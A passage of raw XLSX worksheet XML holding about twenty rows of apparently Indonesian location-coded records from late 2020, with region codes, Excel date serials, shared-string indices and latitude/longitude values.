        <v>31</v>
      </c>
      <c r="Q2474" t="s">
        <v>30</v>
      </c>
      <c r="R2474" t="s">
        <v>31</v>
      </c>
      <c r="S2474" t="s">
        <v>32</v>
      </c>
      <c r="T2474" t="s">
        <v>33</v>
      </c>
      <c r="U2474" s="5">
        <v>10677545</v>
      </c>
      <c r="V2474" s="5" t="s">
        <v>16661</v>
      </c>
      <c r="W2474" s="5">
        <v>-618530</v>
      </c>
      <c r="X2474" t="s">
        <v>20402</v>
      </c>
      <c r="Y2474" t="str">
        <f t="shared" si="38"/>
        <v>-6.18530,106.77545</v>
      </c>
    </row>
    <row r="2475" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2475">
        <v>221511</v>
      </c>
      <c r="B2475" s="1">
        <v>44141</v>
      </c>
      <c r="C2475" s="2">
        <v>0.41875000000000001</v>
      </c>
      <c r="D2475" t="s">
        <v>2648</v>
      </c>
      <c r="E2475" t="s">
        <v>23</v>
      </c>
      <c r="G2475" t="s">
        <v>8302</v>
      </c>
      <c r="H2475" t="s">
        <v>26</v>
      </c>
      <c r="J2475" t="s">
        <v>2627</v>
      </c>
      <c r="L2475" t="s">
        <v>8303</v>
      </c>
      <c r="M2475">
        <v>3201220005</v>
      </c>
      <c r="N2475">
        <v>3201220</v>
      </c>
      <c r="O2475">
        <v>3201</v>
      </c>
      <c r="P2475">
        <v>32</v>
      </c>
      <c r="Q2475" t="s">
        <v>2147</v>
      </c>
      <c r="R2475" t="s">
        <v>2147</v>
      </c>
      <c r="S2475" t="s">
        <v>421</v>
      </c>
      <c r="T2475" t="s">
        <v>42</v>
      </c>
      <c r="U2475" s="5">
        <v>10679395</v>
      </c>
      <c r="V2475" s="5" t="s">
        <v>16662</v>
      </c>
      <c r="W2475" s="5">
        <v>-649229</v>
      </c>
      <c r="X2475" t="s">
        <v>20403</v>
      </c>
      <c r="Y2475" t="str">
        <f t="shared" si="38"/>
        <v>-6.49229,106.79395</v>
      </c>
    </row>
    <row r="2476" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2476">
        <v>221517</v>
      </c>
      <c r="B2476" s="1">
        <v>44142</v>
      </c>
      <c r="C2476" s="2">
        <v>0.67986111111111114</v>
      </c>
      <c r="D2476" t="s">
        <v>2648</v>
      </c>
      <c r="E2476" t="s">
        <v>23</v>
      </c>
      <c r="G2476" t="s">
        <v>8304</v>
      </c>
      <c r="H2476" t="s">
        <v>26</v>
      </c>
      <c r="J2476" t="s">
        <v>5647</v>
      </c>
      <c r="L2476" t="s">
        <v>8305</v>
      </c>
      <c r="M2476">
        <v>3171020006</v>
      </c>
      <c r="N2476">
        <v>3171020</v>
      </c>
      <c r="O2476">
        <v>3171</v>
      </c>
      <c r="P2476">
        <v>31</v>
      </c>
      <c r="Q2476" t="s">
        <v>499</v>
      </c>
      <c r="R2476" t="s">
        <v>484</v>
      </c>
      <c r="S2476" t="s">
        <v>108</v>
      </c>
      <c r="T2476" t="s">
        <v>33</v>
      </c>
      <c r="U2476" s="5">
        <v>10683608</v>
      </c>
      <c r="V2476" s="5" t="s">
        <v>16663</v>
      </c>
      <c r="W2476" s="5">
        <v>-627416</v>
      </c>
      <c r="X2476" t="s">
        <v>20404</v>
      </c>
      <c r="Y2476" t="str">
        <f t="shared" si="38"/>
        <v>-6.27416,106.83608</v>
      </c>
    </row>
    <row r="2477" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2477">
        <v>221586</v>
      </c>
      <c r="B2477" s="1">
        <v>44143</v>
      </c>
      <c r="C2477" s="2">
        <v>0.17569444444444446</v>
      </c>
      <c r="D2477" t="s">
        <v>2648</v>
      </c>
      <c r="E2477" t="s">
        <v>23</v>
      </c>
      <c r="G2477" t="s">
        <v>8306</v>
      </c>
      <c r="H2477" t="s">
        <v>26</v>
      </c>
      <c r="J2477" t="s">
        <v>1094</v>
      </c>
      <c r="L2477" t="s">
        <v>8307</v>
      </c>
      <c r="M2477">
        <v>3172060008</v>
      </c>
      <c r="N2477">
        <v>3172060</v>
      </c>
      <c r="O2477">
        <v>3172</v>
      </c>
      <c r="P2477">
        <v>31</v>
      </c>
      <c r="Q2477" t="s">
        <v>1096</v>
      </c>
      <c r="R2477" t="s">
        <v>48</v>
      </c>
      <c r="S2477" t="s">
        <v>49</v>
      </c>
      <c r="T2477" t="s">
        <v>33</v>
      </c>
      <c r="U2477" s="5">
        <v>10686379</v>
      </c>
      <c r="V2477" s="5" t="s">
        <v>16664</v>
      </c>
      <c r="W2477" s="5">
        <v>-621631</v>
      </c>
      <c r="X2477" t="s">
        <v>19352</v>
      </c>
      <c r="Y2477" t="str">
        <f t="shared" si="38"/>
        <v>-6.21631,106.86379</v>
      </c>
    </row>
    <row r="2478" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2478">
        <v>221607</v>
      </c>
      <c r="B2478" s="1">
        <v>44143</v>
      </c>
      <c r="C2478" s="2">
        <v>0.1986111111111111</v>
      </c>
      <c r="D2478" t="s">
        <v>2648</v>
      </c>
      <c r="E2478" t="s">
        <v>23</v>
      </c>
      <c r="G2478" t="s">
        <v>8308</v>
      </c>
      <c r="H2478" t="s">
        <v>26</v>
      </c>
      <c r="J2478" t="s">
        <v>8309</v>
      </c>
      <c r="L2478" t="s">
        <v>8310</v>
      </c>
      <c r="M2478">
        <v>3171080001</v>
      </c>
      <c r="N2478">
        <v>3171080</v>
      </c>
      <c r="O2478">
        <v>3171</v>
      </c>
      <c r="P2478">
        <v>31</v>
      </c>
      <c r="Q2478" t="s">
        <v>2265</v>
      </c>
      <c r="R2478" t="s">
        <v>1403</v>
      </c>
      <c r="S2478" t="s">
        <v>108</v>
      </c>
      <c r="T2478" t="s">
        <v>33</v>
      </c>
      <c r="U2478" s="5">
        <v>10683249</v>
      </c>
      <c r="V2478" s="5" t="s">
        <v>16665</v>
      </c>
      <c r="W2478" s="5">
        <v>-626145</v>
      </c>
      <c r="X2478" t="s">
        <v>20405</v>
      </c>
      <c r="Y2478" t="str">
        <f t="shared" si="38"/>
        <v>-6.26145,106.83249</v>
      </c>
    </row>
    <row r="2479" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2479">
        <v>221647</v>
      </c>
      <c r="B2479" s="1">
        <v>44143</v>
      </c>
      <c r="C2479" s="2">
        <v>0.38482638888888893</v>
      </c>
      <c r="D2479" t="s">
        <v>85</v>
      </c>
      <c r="E2479" t="s">
        <v>23</v>
      </c>
      <c r="F2479" t="s">
        <v>8311</v>
      </c>
      <c r="G2479" t="s">
        <v>8312</v>
      </c>
      <c r="H2479" t="s">
        <v>26</v>
      </c>
      <c r="J2479" t="s">
        <v>2627</v>
      </c>
      <c r="K2479" t="s">
        <v>8313</v>
      </c>
      <c r="L2479" t="s">
        <v>8314</v>
      </c>
      <c r="M2479">
        <v>3216071008</v>
      </c>
      <c r="N2479">
        <v>3216071</v>
      </c>
      <c r="O2479">
        <v>3216</v>
      </c>
      <c r="P2479">
        <v>32</v>
      </c>
      <c r="Q2479" t="s">
        <v>2012</v>
      </c>
      <c r="R2479" t="s">
        <v>2013</v>
      </c>
      <c r="S2479" t="s">
        <v>41</v>
      </c>
      <c r="T2479" t="s">
        <v>42</v>
      </c>
      <c r="U2479" s="5">
        <v>10711078</v>
      </c>
      <c r="V2479" s="5" t="s">
        <v>16666</v>
      </c>
      <c r="W2479" s="5">
        <v>-627160</v>
      </c>
      <c r="X2479" t="s">
        <v>20406</v>
      </c>
      <c r="Y2479" t="str">
        <f t="shared" si="38"/>
        <v>-6.27160,107.11078</v>
      </c>
    </row>
    <row r="2480" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2480">
        <v>221665</v>
      </c>
      <c r="B2480" s="1">
        <v>44143</v>
      </c>
      <c r="C2480" s="2">
        <v>0.44513888888888892</v>
      </c>
      <c r="D2480" t="s">
        <v>2648</v>
      </c>
      <c r="E2480" t="s">
        <v>23</v>
      </c>
      <c r="G2480" t="s">
        <v>8315</v>
      </c>
      <c r="H2480" t="s">
        <v>26</v>
      </c>
      <c r="J2480" t="s">
        <v>5647</v>
      </c>
      <c r="L2480" t="s">
        <v>8316</v>
      </c>
      <c r="M2480">
        <v>3171020006</v>
      </c>
      <c r="N2480">
        <v>3171020</v>
      </c>
      <c r="O2480">
        <v>3171</v>
      </c>
      <c r="P2480">
        <v>31</v>
      </c>
      <c r="Q2480" t="s">
        <v>499</v>
      </c>
      <c r="R2480" t="s">
        <v>484</v>
      </c>
      <c r="S2480" t="s">
        <v>108</v>
      </c>
      <c r="T2480" t="s">
        <v>33</v>
      </c>
      <c r="U2480" s="5">
        <v>10683479</v>
      </c>
      <c r="V2480" s="5" t="s">
        <v>16667</v>
      </c>
      <c r="W2480" s="5">
        <v>-627537</v>
      </c>
      <c r="X2480" t="s">
        <v>20407</v>
      </c>
      <c r="Y2480" t="str">
        <f t="shared" si="38"/>
        <v>-6.27537,106.83479</v>
      </c>
    </row>
    <row r="2481" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2481">
        <v>221829</v>
      </c>
      <c r="B2481" s="1">
        <v>44143</v>
      </c>
      <c r="C2481" s="2">
        <v>0.72945601851851849</v>
      </c>
      <c r="D2481" t="s">
        <v>22</v>
      </c>
      <c r="E2481" t="s">
        <v>23</v>
      </c>
      <c r="F2481" t="s">
        <v>8317</v>
      </c>
      <c r="H2481" t="s">
        <v>26</v>
      </c>
      <c r="I2481" t="s">
        <v>3668</v>
      </c>
      <c r="J2481" t="s">
        <v>7436</v>
      </c>
      <c r="L2481" t="s">
        <v>8318</v>
      </c>
      <c r="M2481">
        <v>6105170005</v>
      </c>
      <c r="N2481">
        <v>6105170</v>
      </c>
      <c r="O2481">
        <v>6105</v>
      </c>
      <c r="P2481">
        <v>61</v>
      </c>
      <c r="Q2481" t="s">
        <v>8319</v>
      </c>
      <c r="R2481" t="s">
        <v>8320</v>
      </c>
      <c r="S2481" t="s">
        <v>8321</v>
      </c>
      <c r="T2481" t="s">
        <v>7441</v>
      </c>
      <c r="U2481" s="5">
        <v>11024811</v>
      </c>
      <c r="V2481" s="5" t="s">
        <v>16668</v>
      </c>
      <c r="W2481" s="5">
        <v>28861</v>
      </c>
      <c r="X2481" t="s">
        <v>14446</v>
      </c>
      <c r="Y2481" t="str">
        <f t="shared" si="38"/>
        <v>0.28861,110.24811</v>
      </c>
    </row>
    <row r="2482" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2482">
        <v>222062</v>
      </c>
      <c r="B2482" s="1">
        <v>44144</v>
      </c>
      <c r="C2482" s="2">
        <v>0.13125000000000001</v>
      </c>
      <c r="D2482" t="s">
        <v>2648</v>
      </c>
      <c r="E2482" t="s">
        <v>23</v>
      </c>
      <c r="G2482" t="s">
        <v>8322</v>
      </c>
      <c r="H2482" t="s">
        <v>26</v>
      </c>
      <c r="J2482" t="s">
        <v>409</v>
      </c>
      <c r="L2482" t="s">
        <v>8323</v>
      </c>
      <c r="M2482">
        <v>3171040003</v>
      </c>
      <c r="N2482">
        <v>3171040</v>
      </c>
      <c r="O2482">
        <v>3171</v>
      </c>
      <c r="P2482">
        <v>31</v>
      </c>
      <c r="Q2482" t="s">
        <v>411</v>
      </c>
      <c r="R2482" t="s">
        <v>163</v>
      </c>
      <c r="S2482" t="s">
        <v>108</v>
      </c>
      <c r="T2482" t="s">
        <v>33</v>
      </c>
      <c r="U2482" s="5">
        <v>10676737</v>
      </c>
      <c r="V2482" s="5" t="s">
        <v>16669</v>
      </c>
      <c r="W2482" s="5">
        <v>-624383</v>
      </c>
      <c r="X2482" t="s">
        <v>20408</v>
      </c>
      <c r="Y2482" t="str">
        <f t="shared" si="38"/>
        <v>-6.24383,106.76737</v>
      </c>
    </row>
    <row r="2483" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2483">
        <v>222216</v>
      </c>
      <c r="B2483" s="1">
        <v>44144</v>
      </c>
      <c r="C2483" s="2">
        <v>0.38611111111111113</v>
      </c>
      <c r="D2483" t="s">
        <v>22</v>
      </c>
      <c r="E2483" t="s">
        <v>23</v>
      </c>
      <c r="F2483" t="s">
        <v>8324</v>
      </c>
      <c r="G2483" t="s">
        <v>8325</v>
      </c>
      <c r="H2483" t="s">
        <v>26</v>
      </c>
      <c r="I2483" t="s">
        <v>893</v>
      </c>
      <c r="J2483" t="s">
        <v>2627</v>
      </c>
      <c r="L2483" t="s">
        <v>8326</v>
      </c>
      <c r="M2483">
        <v>3273030001</v>
      </c>
      <c r="N2483">
        <v>3273030</v>
      </c>
      <c r="O2483">
        <v>3273</v>
      </c>
      <c r="P2483">
        <v>32</v>
      </c>
      <c r="Q2483" t="s">
        <v>8327</v>
      </c>
      <c r="R2483" t="s">
        <v>8328</v>
      </c>
      <c r="S2483" t="s">
        <v>1464</v>
      </c>
      <c r="T2483" t="s">
        <v>42</v>
      </c>
      <c r="U2483" s="5">
        <v>10759256</v>
      </c>
      <c r="V2483" s="5" t="s">
        <v>16670</v>
      </c>
      <c r="W2483" s="5">
        <v>-694119</v>
      </c>
      <c r="X2483" t="s">
        <v>20409</v>
      </c>
      <c r="Y2483" t="str">
        <f t="shared" si="38"/>
        <v>-6.94119,107.59256</v>
      </c>
    </row>
    <row r="2484" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2484">
        <v>222488</v>
      </c>
      <c r="B2484" s="1">
        <v>44145</v>
      </c>
      <c r="C2484" s="2">
        <v>0.32905092592592594</v>
      </c>
      <c r="D2484" t="s">
        <v>22</v>
      </c>
      <c r="E2484" t="s">
        <v>23</v>
      </c>
      <c r="F2484" t="s">
        <v>8329</v>
      </c>
      <c r="H2484" t="s">
        <v>26</v>
      </c>
      <c r="I2484" t="s">
        <v>1542</v>
      </c>
      <c r="J2484" t="s">
        <v>6626</v>
      </c>
      <c r="L2484" t="s">
        <v>8330</v>
      </c>
      <c r="M2484">
        <v>7322120019</v>
      </c>
      <c r="N2484">
        <v>7322120</v>
      </c>
      <c r="O2484">
        <v>7322</v>
      </c>
      <c r="P2484">
        <v>73</v>
      </c>
      <c r="Q2484" t="s">
        <v>8331</v>
      </c>
      <c r="R2484" t="s">
        <v>7541</v>
      </c>
      <c r="S2484" t="s">
        <v>7542</v>
      </c>
      <c r="T2484" t="s">
        <v>6630</v>
      </c>
      <c r="U2484" s="5">
        <v>12032413</v>
      </c>
      <c r="V2484" s="5" t="s">
        <v>16671</v>
      </c>
      <c r="W2484" s="5">
        <v>-255253</v>
      </c>
      <c r="X2484" t="s">
        <v>20410</v>
      </c>
      <c r="Y2484" t="str">
        <f t="shared" si="38"/>
        <v>-2.55253,120.32413</v>
      </c>
    </row>
    <row r="2485" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2485">
        <v>222518</v>
      </c>
      <c r="B2485" s="1">
        <v>44149</v>
      </c>
      <c r="C2485" s="2">
        <v>0.20825231481481479</v>
      </c>
      <c r="D2485" t="s">
        <v>22</v>
      </c>
      <c r="E2485" t="s">
        <v>23</v>
      </c>
      <c r="F2485" t="s">
        <v>8332</v>
      </c>
      <c r="H2485" t="s">
        <v>26</v>
      </c>
      <c r="I2485" t="s">
        <v>3275</v>
      </c>
      <c r="J2485" t="s">
        <v>7399</v>
      </c>
      <c r="L2485" t="s">
        <v>8333</v>
      </c>
      <c r="M2485">
        <v>1473020005</v>
      </c>
      <c r="N2485">
        <v>1473020</v>
      </c>
      <c r="O2485">
        <v>1473</v>
      </c>
      <c r="P2485">
        <v>14</v>
      </c>
      <c r="Q2485" t="s">
        <v>8334</v>
      </c>
      <c r="R2485" t="s">
        <v>8335</v>
      </c>
      <c r="S2485" t="s">
        <v>7939</v>
      </c>
      <c r="T2485" t="s">
        <v>7404</v>
      </c>
      <c r="U2485" s="5">
        <v>10143134</v>
      </c>
      <c r="V2485" s="5" t="s">
        <v>16672</v>
      </c>
      <c r="W2485" s="5">
        <v>168412</v>
      </c>
      <c r="X2485" t="s">
        <v>20411</v>
      </c>
      <c r="Y2485" t="str">
        <f t="shared" si="38"/>
        <v>1.68412,101.43134</v>
      </c>
    </row>
    <row r="2486" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2486">
        <v>222519</v>
      </c>
      <c r="B2486" s="1">
        <v>44149</v>
      </c>
      <c r="C2486" s="2">
        <v>0.60771990740740744</v>
      </c>
      <c r="D2486" t="s">
        <v>22</v>
      </c>
      <c r="E2486" t="s">
        <v>23</v>
      </c>
      <c r="F2486" t="s">
        <v>8336</v>
      </c>
      <c r="G2486" t="s">
        <v>8337</v>
      </c>
      <c r="H2486" t="s">
        <v>26</v>
      </c>
      <c r="I2486" t="s">
        <v>8338</v>
      </c>
      <c r="J2486" t="s">
        <v>6038</v>
      </c>
      <c r="L2486" t="s">
        <v>8339</v>
      </c>
      <c r="M2486">
        <v>1212080014</v>
      </c>
      <c r="N2486">
        <v>1212080</v>
      </c>
      <c r="O2486">
        <v>1212</v>
      </c>
      <c r="P2486">
        <v>12</v>
      </c>
      <c r="Q2486" t="s">
        <v>8340</v>
      </c>
      <c r="R2486" t="s">
        <v>8341</v>
      </c>
      <c r="S2486" t="s">
        <v>8342</v>
      </c>
      <c r="T2486" t="s">
        <v>6043</v>
      </c>
      <c r="U2486" s="5">
        <v>9877214</v>
      </c>
      <c r="V2486" s="5" t="s">
        <v>16673</v>
      </c>
      <c r="W2486" s="5">
        <v>348407</v>
      </c>
      <c r="X2486" t="s">
        <v>20412</v>
      </c>
      <c r="Y2486" t="str">
        <f t="shared" si="38"/>
        <v>3.48407,98.77214</v>
      </c>
    </row>
    <row r="2487" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2487">
        <v>222520</v>
      </c>
      <c r="B2487" s="1">
        <v>44150</v>
      </c>
      <c r="C2487" s="2">
        <v>0.17291666666666669</v>
      </c>
      <c r="D2487" t="s">
        <v>2648</v>
      </c>
      <c r="E2487" t="s">
        <v>23</v>
      </c>
      <c r="G2487" t="s">
        <v>8343</v>
      </c>
      <c r="H2487" t="s">
        <v>26</v>
      </c>
      <c r="J2487" t="s">
        <v>6078</v>
      </c>
      <c r="L2487" t="s">
        <v>8344</v>
      </c>
      <c r="M2487">
        <v>3175010005</v>
      </c>
      <c r="N2487">
        <v>3175010</v>
      </c>
      <c r="O2487">
        <v>3175</v>
      </c>
      <c r="P2487">
        <v>31</v>
      </c>
      <c r="Q2487" t="s">
        <v>1686</v>
      </c>
      <c r="R2487" t="s">
        <v>546</v>
      </c>
      <c r="S2487" t="s">
        <v>547</v>
      </c>
      <c r="T2487" t="s">
        <v>33</v>
      </c>
      <c r="U2487" s="5">
        <v>10677482</v>
      </c>
      <c r="V2487" s="5" t="s">
        <v>14905</v>
      </c>
      <c r="W2487" s="5">
        <v>-610994</v>
      </c>
      <c r="X2487" t="s">
        <v>20413</v>
      </c>
      <c r="Y2487" t="str">
        <f t="shared" si="38"/>
        <v>-6.10994,106.77482</v>
      </c>
    </row>
    <row r="2488" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2488">
        <v>222540</v>
      </c>
      <c r="B2488" s="1">
        <v>44150</v>
      </c>
      <c r="C2488" s="2">
        <v>0.46424768518518517</v>
      </c>
      <c r="D2488" t="s">
        <v>22</v>
      </c>
      <c r="E2488" t="s">
        <v>23</v>
      </c>
      <c r="F2488" t="s">
        <v>8345</v>
      </c>
      <c r="G2488" t="s">
        <v>8346</v>
      </c>
      <c r="H2488" t="s">
        <v>26</v>
      </c>
      <c r="I2488" t="s">
        <v>80</v>
      </c>
      <c r="J2488" t="s">
        <v>2608</v>
      </c>
      <c r="L2488" t="s">
        <v>8347</v>
      </c>
      <c r="M2488">
        <v>3305110020</v>
      </c>
      <c r="N2488">
        <v>3305110</v>
      </c>
      <c r="O2488">
        <v>3305</v>
      </c>
      <c r="P2488">
        <v>33</v>
      </c>
      <c r="Q2488" t="s">
        <v>8348</v>
      </c>
      <c r="R2488" t="s">
        <v>8349</v>
      </c>
      <c r="S2488" t="s">
        <v>7494</v>
      </c>
      <c r="T2488" t="s">
        <v>1134</v>
      </c>
      <c r="U2488" s="5">
        <v>10970168</v>
      </c>
      <c r="V2488" s="5" t="s">
        <v>16674</v>
      </c>
      <c r="W2488" s="5">
        <v>-764176</v>
      </c>
      <c r="X2488" t="s">
        <v>20414</v>
      </c>
      <c r="Y2488" t="str">
        <f t="shared" si="38"/>
        <v>-7.64176,109.70168</v>
      </c>
    </row>
    <row r="2489" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2489">
        <v>222541</v>
      </c>
      <c r="B2489" s="1">
        <v>44151</v>
      </c>
      <c r="C2489" s="2">
        <v>0.10625</v>
      </c>
      <c r="D2489" t="s">
        <v>2648</v>
      </c>
      <c r="E2489" t="s">
        <v>23</v>
      </c>
      <c r="G2489" t="s">
        <v>8350</v>
      </c>
      <c r="H2489" t="s">
        <v>26</v>
      </c>
      <c r="J2489" t="s">
        <v>8351</v>
      </c>
      <c r="L2489" t="s">
        <v>8352</v>
      </c>
      <c r="M2489">
        <v>3174050007</v>
      </c>
      <c r="N2489">
        <v>3174050</v>
      </c>
      <c r="O2489">
        <v>3174</v>
      </c>
      <c r="P2489">
        <v>31</v>
      </c>
      <c r="Q2489" t="s">
        <v>5243</v>
      </c>
      <c r="R2489" t="s">
        <v>2826</v>
      </c>
      <c r="S2489" t="s">
        <v>32</v>
      </c>
      <c r="T2489" t="s">
        <v>33</v>
      </c>
      <c r="U2489" s="5">
        <v>10679582</v>
      </c>
      <c r="V2489" s="5" t="s">
        <v>16675</v>
      </c>
      <c r="W2489" s="5">
        <v>-614526</v>
      </c>
      <c r="X2489" t="s">
        <v>20415</v>
      </c>
      <c r="Y2489" t="str">
        <f t="shared" si="38"/>
        <v>-6.14526,106.79582</v>
      </c>
    </row>
    <row r="2490" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2490">
        <v>222562</v>
      </c>
      <c r="B2490" s="1">
        <v>44151</v>
      </c>
      <c r="C2490" s="2">
        <v>0.22847222222222222</v>
      </c>
      <c r="D2490" t="s">
        <v>2648</v>
      </c>
      <c r="E2490" t="s">
        <v>23</v>
      </c>
      <c r="G2490" t="s">
        <v>8353</v>
      </c>
      <c r="H2490" t="s">
        <v>26</v>
      </c>
      <c r="J2490" t="s">
        <v>8354</v>
      </c>
      <c r="L2490" t="s">
        <v>8355</v>
      </c>
      <c r="M2490">
        <v>3174080004</v>
      </c>
      <c r="N2490">
        <v>3174080</v>
      </c>
      <c r="O2490">
        <v>3174</v>
      </c>
      <c r="P2490">
        <v>31</v>
      </c>
      <c r="Q2490" t="s">
        <v>1696</v>
      </c>
      <c r="R2490" t="s">
        <v>695</v>
      </c>
      <c r="S2490" t="s">
        <v>32</v>
      </c>
      <c r="T2490" t="s">
        <v>33</v>
      </c>
      <c r="U2490" s="5">
        <v>10671176</v>
      </c>
      <c r="V2490" s="5" t="s">
        <v>14859</v>
      </c>
      <c r="W2490" s="5">
        <v>-610458</v>
      </c>
      <c r="X2490" t="s">
        <v>20416</v>
      </c>
      <c r="Y2490" t="str">
        <f t="shared" si="38"/>
        <v>-6.10458,106.71176</v>
      </c>
    </row>
    <row r="2491" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2491">
        <v>222563</v>
      </c>
      <c r="B2491" s="1">
        <v>44151</v>
      </c>
      <c r="C2491" s="2">
        <v>0.22777777777777777</v>
      </c>
      <c r="D2491" t="s">
        <v>2648</v>
      </c>
      <c r="E2491" t="s">
        <v>23</v>
      </c>
      <c r="G2491" t="s">
        <v>8356</v>
      </c>
      <c r="H2491" t="s">
        <v>26</v>
      </c>
      <c r="J2491" t="s">
        <v>8354</v>
      </c>
      <c r="L2491" t="s">
        <v>8357</v>
      </c>
      <c r="M2491">
        <v>3174080004</v>
      </c>
      <c r="N2491">
        <v>3174080</v>
      </c>
      <c r="O2491">
        <v>3174</v>
      </c>
      <c r="P2491">
        <v>31</v>
      </c>
      <c r="Q2491" t="s">
        <v>1696</v>
      </c>
      <c r="R2491" t="s">
        <v>695</v>
      </c>
      <c r="S2491" t="s">
        <v>32</v>
      </c>
      <c r="T2491" t="s">
        <v>33</v>
      </c>
      <c r="U2491" s="5">
        <v>10671181</v>
      </c>
      <c r="V2491" s="5" t="s">
        <v>16676</v>
      </c>
      <c r="W2491" s="5">
        <v>-610461</v>
      </c>
      <c r="X2491" t="s">
        <v>20417</v>
      </c>
      <c r="Y2491" t="str">
        <f t="shared" si="38"/>
        <v>-6.10461,106.71181</v>
      </c>
    </row>
    <row r="2492" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2492">
        <v>222640</v>
      </c>
      <c r="B2492" s="1">
        <v>44151</v>
      </c>
      <c r="C2492" s="2">
        <v>0.37361111111111112</v>
      </c>
      <c r="D2492" t="s">
        <v>2648</v>
      </c>
      <c r="E2492" t="s">
        <v>23</v>
      </c>
      <c r="G2492" t="s">
        <v>8358</v>
      </c>
      <c r="H2492" t="s">
        <v>26</v>
      </c>
      <c r="J2492" t="s">
        <v>4758</v>
      </c>
      <c r="L2492" t="s">
        <v>8359</v>
      </c>
      <c r="M2492">
        <v>3175020002</v>
      </c>
      <c r="N2492">
        <v>3175020</v>
      </c>
      <c r="O2492">
        <v>3175</v>
      </c>
      <c r="P2492">
        <v>31</v>
      </c>
      <c r="Q2492" t="s">
        <v>4760</v>
      </c>
      <c r="R2492" t="s">
        <v>2228</v>
      </c>
      <c r="S2492" t="s">
        <v>547</v>
      </c>
      <c r="T2492" t="s">
        <v>33</v>
      </c>
      <c r="U2492" s="5">
        <v>10684522</v>
      </c>
      <c r="V2492" s="5" t="s">
        <v>16677</v>
      </c>
      <c r="W2492" s="5">
        <v>-614277</v>
      </c>
      <c r="X2492" t="s">
        <v>20418</v>
      </c>
      <c r="Y2492" t="str">
        <f t="shared" si="38"/>
        <v>-6.14277,106.84522</v>
      </c>
    </row>
    <row r="2493" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2493">
        <v>222893</v>
      </c>
      <c r="B2493" s="1">
        <v>44151</v>
      </c>
      <c r="C2493" s="2">
        <v>0.80731481481481471</v>
      </c>
      <c r="D2493" t="s">
        <v>22</v>
      </c>
      <c r="E2493" t="s">
        <v>23</v>
      </c>
      <c r="F2493" t="s">
        <v>8360</v>
      </c>
      <c r="G2493" t="s">
        <v>8361</v>
      </c>
      <c r="H2493" t="s">
        <v>26</v>
      </c>
      <c r="I2493" t="s">
        <v>1991</v>
      </c>
      <c r="J2493" t="s">
        <v>2622</v>
      </c>
      <c r="L2493" t="s">
        <v>8362</v>
      </c>
      <c r="M2493">
        <v>3571020013</v>
      </c>
      <c r="N2493">
        <v>3571020</v>
      </c>
      <c r="O2493">
        <v>3571</v>
      </c>
      <c r="P2493">
        <v>35</v>
      </c>
      <c r="Q2493" t="s">
        <v>8363</v>
      </c>
      <c r="R2493" t="s">
        <v>8364</v>
      </c>
      <c r="S2493" t="s">
        <v>8365</v>
      </c>
      <c r="T2493" t="s">
        <v>1221</v>
      </c>
      <c r="U2493" s="5">
        <v>11202248</v>
      </c>
      <c r="V2493" s="5" t="s">
        <v>16678</v>
      </c>
      <c r="W2493" s="5">
        <v>-781192</v>
      </c>
      <c r="X2493" t="s">
        <v>20419</v>
      </c>
      <c r="Y2493" t="str">
        <f t="shared" si="38"/>
        <v>-7.81192,112.02248</v>
      </c>
    </row>
    <row r="2494" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2494">
        <v>223224</v>
      </c>
      <c r="B2494" s="1">
        <v>44152</v>
      </c>
      <c r="C2494" s="2">
        <v>0.3029398148148148</v>
      </c>
      <c r="D2494" t="s">
        <v>22</v>
      </c>
      <c r="E2494" t="s">
        <v>23</v>
      </c>
      <c r="F2494" t="s">
        <v>8366</v>
      </c>
      <c r="G2494" t="s">
        <v>8367</v>
      </c>
      <c r="H2494" t="s">
        <v>7978</v>
      </c>
      <c r="I2494" t="s">
        <v>8368</v>
      </c>
      <c r="J2494" t="s">
        <v>2622</v>
      </c>
      <c r="L2494" t="s">
        <v>8369</v>
      </c>
      <c r="M2494">
        <v>3510180008</v>
      </c>
      <c r="N2494">
        <v>3510180</v>
      </c>
      <c r="O2494">
        <v>3510</v>
      </c>
      <c r="P2494">
        <v>35</v>
      </c>
      <c r="Q2494" t="s">
        <v>6244</v>
      </c>
      <c r="R2494" t="s">
        <v>8370</v>
      </c>
      <c r="S2494" t="s">
        <v>8370</v>
      </c>
      <c r="T2494" t="s">
        <v>1221</v>
      </c>
      <c r="U2494" s="5">
        <v>11437755</v>
      </c>
      <c r="V2494" s="5" t="s">
        <v>16679</v>
      </c>
      <c r="W2494" s="5">
        <v>-821090</v>
      </c>
      <c r="X2494" t="s">
        <v>20420</v>
      </c>
      <c r="Y2494" t="str">
        <f t="shared" si="38"/>
        <v>-8.21090,114.37755</v>
      </c>
    </row>
    <row r="2495" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2495">
        <v>223247</v>
      </c>
      <c r="B2495" s="1">
        <v>44152</v>
      </c>
      <c r="C2495" s="2">
        <v>0.24861111111111112</v>
      </c>
      <c r="D2495" t="s">
        <v>2648</v>
      </c>
      <c r="E2495" t="s">
        <v>23</v>
      </c>
      <c r="G2495" t="s">
        <v>8371</v>
      </c>
      <c r="H2495" t="s">
        <v>26</v>
      </c>
      <c r="J2495" t="s">
        <v>8354</v>
      </c>
      <c r="L2495" t="s">
        <v>8372</v>
      </c>
      <c r="M2495">
        <v>3174080004</v>
      </c>
      <c r="N2495">
        <v>3174080</v>
      </c>
      <c r="O2495">
        <v>3174</v>
      </c>
      <c r="P2495">
        <v>31</v>
      </c>
      <c r="Q2495" t="s">
        <v>1696</v>
      </c>
      <c r="R2495" t="s">
        <v>695</v>
      </c>
      <c r="S2495" t="s">
        <v>32</v>
      </c>
      <c r="T2495" t="s">
